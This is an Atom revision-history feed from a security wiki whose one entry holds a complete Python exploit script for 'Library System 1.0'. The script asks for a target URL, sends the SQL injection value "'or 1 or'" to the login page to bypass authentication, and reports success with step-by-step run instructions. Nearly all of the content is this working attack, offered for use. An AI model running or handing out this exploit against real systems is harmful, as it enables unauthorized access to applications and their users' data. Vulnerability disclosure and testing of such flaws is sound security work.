<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Library_System_1.0_SQL%E6%B3%A8%E5%85%A5%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E</id>
	<title>Library System 1.0 SQL注入身份驗證繞過漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Library_System_1.0_SQL%E6%B3%A8%E5%85%A5%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Library_System_1.0_SQL%E6%B3%A8%E5%85%A5%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-20T23:45:29Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Library_System_1.0_SQL%E6%B3%A8%E5%85%A5%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E&amp;diff=1269&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: Library System 1.0 - Authentication Bypass Via SQL Injection # Exploit Author: Himanshu Shukla # Date: 2021-01-21 # Vendor Homepage: https://www...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Library_System_1.0_SQL%E6%B3%A8%E5%85%A5%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E&amp;diff=1269&amp;oldid=prev"/>
		<updated>2021-04-08T09:41:13Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; # Exploit Title: Library System 1.0 - Authentication Bypass Via SQL Injection # Exploit Author: Himanshu Shukla # Date: 2021-01-21 # Vendor Homepage: https://www...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: Library System 1.0 - Authentication Bypass Via SQL Injection&lt;br /&gt;
# Exploit Author: Himanshu Shukla&lt;br /&gt;
# Date: 2021-01-21&lt;br /&gt;
# Vendor Homepage: https://www.sourcecodester.com/php/12275/library-system-using-php.html&lt;br /&gt;
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/libsystem.zip&lt;br /&gt;
# Version: 1.0&lt;br /&gt;
# Tested On: Windows 10 + XAMPP 7.4.4&lt;br /&gt;
# Description: Library System 1.0 - Authentication Bypass Via SQL Injection&lt;br /&gt;
#STEP 1 : Run The Exploit With This Command : python3 exploit.py&lt;br /&gt;
#STEP 2 : Input the URL of Vulnable Application.  For Example: http://10.9.67.23/libsystem/&lt;br /&gt;
#STEP 3 : Open the Link Provided At The End After Successful authentication bypass in Browser. &lt;br /&gt;
&lt;br /&gt;
#Note - You Will Only Be Able To Access The Student Area as a Privileged User.&lt;br /&gt;
&lt;br /&gt;
import requests&lt;br /&gt;
YELLOW =  '\033[33m' # Yellow Text&lt;br /&gt;
GREEN =  '\033[32m' # Green Text&lt;br /&gt;
RED =  '\033[31m' # Red Text&lt;br /&gt;
RESET = '\033[m' # reset to the defaults&lt;br /&gt;
&lt;br /&gt;
print(YELLOW+'      _          ______  _               _  ___           ', RESET)&lt;br /&gt;
print(YELLOW+'  ___| |_ ___   / / ___|| |__   __ _  __| |/ _ \__      __', RESET)&lt;br /&gt;
print(YELLOW+&amp;quot; / _ \ __/ __| / /|___ \| '_ \ / _` |/ _` | | | \ \ /\ / /&amp;quot;, RESET)&lt;br /&gt;
print(YELLOW+'|  __/ || (__ / /  ___) | | | | (_| | (_| | |_| |\ V  V / ', RESET)&lt;br /&gt;
print(YELLOW+' \___|\__\___/_/  |____/|_| |_|\__,_|\__,_|\___/  \_/\_/  ', RESET)&lt;br /&gt;
print(YELLOW+&amp;quot; &amp;quot;, RESET)                                                          &lt;br /&gt;
print('********************************************************')&lt;br /&gt;
print('**                  LIBRARY SYSTEM 1.0                **')&lt;br /&gt;
print('**     AUTHENTICATION BYPASS USING SQL INJECTION      **')&lt;br /&gt;
print('********************************************************')&lt;br /&gt;
&lt;br /&gt;
print('Author - Himanshu Shukla')&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
#Create a new session&lt;br /&gt;
&lt;br /&gt;
s = requests.Session() &lt;br /&gt;
  &lt;br /&gt;
#Set Cookie&lt;br /&gt;
cookies = {'PHPSESSID': 'c9ead80b7e767a1157b97d2ed1fa25b3'}&lt;br /&gt;
&lt;br /&gt;
LINK=input(&amp;quot;Enter URL of The Vulnarable Application : &amp;quot;)&lt;br /&gt;
&lt;br /&gt;
#Authentication Bypass&lt;br /&gt;
print(&amp;quot;[*]Attempting Authentication Bypass...&amp;quot;)&lt;br /&gt;
values = {&amp;quot;student&amp;quot;:&amp;quot;'or 1 or'&amp;quot;,&amp;quot;login&amp;quot;:&amp;quot;&amp;quot;}&lt;br /&gt;
r=s.post(LINK+'login.php', data=values, cookies=cookies) &lt;br /&gt;
&lt;br /&gt;
r=s.post(LINK+'login.php', data=values, cookies=cookies) &lt;br /&gt;
&lt;br /&gt;
#Check if Authentication was bypassed or not.&lt;br /&gt;
logged_in = True if not(&amp;quot;Student not found&amp;quot; in r.text) else False&lt;br /&gt;
l=logged_in&lt;br /&gt;
if l:&lt;br /&gt;
	print(GREEN+&amp;quot;[+]Authentication Bypass Successful!&amp;quot;, RESET)&lt;br /&gt;
	print(YELLOW+&amp;quot;[+]Open This Link To Continue As Privileged User : &amp;quot;+LINK+&amp;quot;index.php&amp;quot;, RESET)&lt;br /&gt;
else:&lt;br /&gt;
	print(RED+&amp;quot;[-]Failed To Authenticate!&amp;quot;, RESET)&lt;br /&gt;
            &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>